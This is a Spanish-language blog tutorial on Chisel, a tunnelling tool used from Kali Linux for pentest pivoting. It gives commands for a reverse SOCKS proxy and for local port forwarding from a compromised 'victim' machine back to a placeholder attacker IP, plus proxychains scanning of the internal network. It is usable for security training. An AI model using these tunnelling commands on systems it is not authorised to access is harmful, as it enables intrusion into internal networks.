Hacking Pivoting kali linux chisel

 

 https://www.onlinetis.com

Hacking Pivoting kali linux chisel

Chisel es una herramienta de tunelización rápida, escrita en Go, que permite encapsular tráfico TCP y UDP a través de HTTP y asegurarlo mediante SSH. En el mundo del Pentesting y Kali Linux, es extremadamente popular para realizar pivoting y evadir firewalls restrictivos.

A diferencia de otras herramientas, Chisel es un solo binario que funciona tanto como cliente como servidor.


1. Instalación en Kali Linux

Chisel ya se encuentra en los repositorios oficiales de Kali. Puedes instalarlo con el siguiente comando:

Bash
sudo apt update && sudo apt install chisel

Si necesitas los binarios para otras plataformas (como Windows o sistemas ARM) para transferirlos a una víctima, puedes instalar el paquete de binarios comunes:

Bash
sudo apt install chisel-common-binaries

Los encontrarás en /usr/share/chisel-common-binaries/.


2. Escenarios Comunes de Uso

A. Reverse SOCKS Proxy (Pivoting)

Este es el uso más frecuente: quieres acceder a toda la red interna desde tu máquina de Kali a través de una máquina comprometida.

  1. En tu máquina (Kali - Servidor):

    Bash
    chisel server --reverse --port 8080
    

    Esto levanta el servidor escuchando en el puerto 8080.

  2. En la máquina comprometida (Cliente):

    Bash
    ./chisel client <TU_IP_KALI>:8080 R:socks
    

    Esto crea un túnel hacia tu Kali y levanta un proxy SOCKS5 (por defecto en el puerto 1080 de tu Kali).

  3. Configuración en Kali:

    Edita el archivo /etc/proxychains4.conf y añade al final:

    Plaintext
    socks5 127.0.0.1 1080
    

    Ahora puedes ejecutar herramientas como nmap a través del túnel: proxychains nmap -sT -Pn 10.10.10.5.


B. Port Forwarding Local

Si quieres traer un puerto de la máquina víctima (que solo escucha localmente, como un panel de administración en el puerto 80) a tu Kali.

  1. En Kali (Servidor):

    Bash
    chisel server --port 8000
    
  2. En la víctima (Cliente):

    Bash
    ./chisel client <TU_IP_KALI>:8000 1234:127.0.0.1:80
    

    Ahora, si vas a localhost:1234 en tu navegador de Kali, estarás viendo el puerto 80 de la víctima.


3. Resumen de comandos útiles

ComandoFunción
--reversePermite que el cliente dicte los túneles al servidor (indispensable para pivoting).
-p, --portDefine el puerto donde escuchará el servidor.
R:socksLevanta un proxy SOCKS dinámico en el lado del servidor.
R:80:127.0.0.1:80Mapea el puerto 80 del cliente al puerto 80 del servidor (Remote Forward).

Recomendación de Seguridad

Cuando uses Chisel en entornos reales, recuerda que por defecto no requiere autenticación. Puedes añadir una capa de seguridad con el parámetro --auth usuario:contraseña tanto en el servidor como en el cliente.

Entradas populares de este blog

Hacking y ciberseguridad en kali linux con Fping

Hacking y ciberseguridad en kali linux con atk6-thcping6

Como utilizar Fierce en kali linux